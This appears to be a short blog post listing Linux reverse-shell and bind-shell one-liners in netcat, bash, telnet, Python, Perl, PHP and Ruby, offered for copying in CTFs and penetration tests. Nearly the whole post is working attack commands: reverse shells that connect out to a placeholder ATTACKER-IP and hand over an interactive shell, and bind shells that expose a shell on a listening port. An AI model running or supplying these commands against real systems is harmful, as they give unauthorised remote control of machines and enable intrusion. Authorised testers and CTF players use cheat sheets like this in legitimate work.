Skip to main content

Some oneliners for Reverse-Shells or Bind-Shells

· 2 min read
Strider

Hi, I thought I'd introduce a few one liners in terms of reverse and bind shells.

On Linux there are a lot of ways to create a reverse/bind shell. I show you some of them. You can copy them if needed and use them for CTF's or penetration tests.

Reverse-Shells:

NC/NetCat:

strider@paff-shell.com~$ /bin/nc ATTACKER-IP ATTACKER-PORT  -e /bin/sh
strider@paff-shell.com~$ /bin/nc ATTACKER-IP <port>  -c /bin/sh
strider@paff-shell.com~$ rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc ATTACKER-IP ATTACKER-PORT > /tmp/f

Bash:

strider@paff-shell.com~$ /bin/bash -i &> /dev/tcp/ATTACKER-IP/ATTACKER-PORT 0>&1
strider@paff-shell.com~$ /bin/sh -i &> /dev/udp/ATTACKER-IP/ATTACKER-PORT 0>&1

Telnet:

strider@paff-shell.com~$ telnet ATTACKER-IP ATTACKER-PORT1 | /bin/bash | telnet ATTACKER-IP ATTACKER-PORT2
strider@paff-shell.com~$ rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | telnet ATTACKER-IP ATTACKER-PORT > /tmp/f

Python:

strider@paff-shell.com~$ python -c "import os, socket, subprocess;s=socket.socket(socket.AF_INET, socket.SOCK_STREAM);s.connect(('ATTACKER-IP', ATTACKER-PORT));os.dup2(s.fileno(), 0);os.dup2(s.fileno(), 1);os.dup2(s.fileno(), 2);p = subprocess.Popen(['/bin/bash', '-i']);"

Perl:

strider@paff-shell.com~$ perl -e 'use Socket;$host="ATTACKER-IP";$port=ATTACKER-PORT;socket(Sock, PF_INET, SOCK_STREAM, getprotobyname("tcp"));if(connect(Sock, sockaddr_in($port, inet_aton($host)))){open(STDIN, ">&Sock");open(STDOUT, ">&Sock");open(STDERR, ">&Sock");exec("/bin/bash -i");};'

PHP:

strider@paff-shell.com~$ php -r '$sock=fsockopen("ATTACKER-IP",ATTACKER-PORT);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'

Ruby:

strider@paff-shell.com~$ ruby -rsocket -e "exit if fork;s=TCPSocket.new('ATTACKER-IP',ATTACKER-PORT);while(s.print '$';s2=s.gets);IO.popen(s2,'r'){|s3|s.print s3.read}end"

Bind-Shells

NC/NetCat:

strider@paff-shell.com~$ /bin/nc -e /bin/sh -nlp ATTACKER-PORT
strider@paff-shell.com~$ /bin/nc -c /bin/sh -nlp ATTACKER-PORT
strider@paff-shell.com~$ /bin/nc -c /bin/sh -nlup ATTACKER-PORT
strider@paff-shell.com~$ rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc -lvp ATTACKER-PORT > /tmp/f;

Python:

strider@paff-shell.com~$ python -c "import os, socket, subprocess;s=socket.socket(socket.AF_INET, socket.SOCK_STREAM);s.bind(('0.0.0.0', ATTACKER-PORT));s.listen(5);c, _ = s.accept();os.dup2(c.fileno(), 0);os.dup2(c.fileno(), 1);os.dup2(c.fileno(), 2);p = subprocess.Popen(['/bin/bash', '-i']);"

Perl:

strider@paff-shell.com~$ perl -e 'use Socket;$port=ATTACKER-PORT;socket(Sock, PF_INET, SOCK_STREAM, getprotobyname("tcp"));bind(Sock, sockaddr_in($port, INADDR_ANY));listen(Sock, SOMAXCONN);for(; $c = accept(C, Sock); close(Sock)){open(STDIN, ">&C");open(STDOUT, ">&C");open(STDERR, ">&C");exec("/bin/bash -i");};'

PHP:

strider@paff-shell.com~$ php -r '$sock=socket_create(AF_INET, SOCK_STREAM, SOL_TCP);socket_get_option($sock, SOL_SOCKET, SO_REUSEADDR);socket_bind($sock, "0.0.0.0", ATTACKER-PORT); socket_listen($sock); $c=socket_accept($sock);while(true){$cmd=socket_read($c, 1024);socket_write($c, shell_exec($cmd));}'

Ruby:

strider@paff-shell.com~$ ruby -rsocket -e "exit if fork;s=TCPServer.new(ATTACKER-PORT);loop do;c=s.accept();while(c.print '$';s2=c.gets);puts s2;IO.popen(s2,'r'){|s3|c.print s3.read};end;end"

You can find all the one liners again in a repository of mine 😄 I will update the whole thing in between times. Small info on the side, I will not enter all One-Liner in this post, if are all in my repository 😄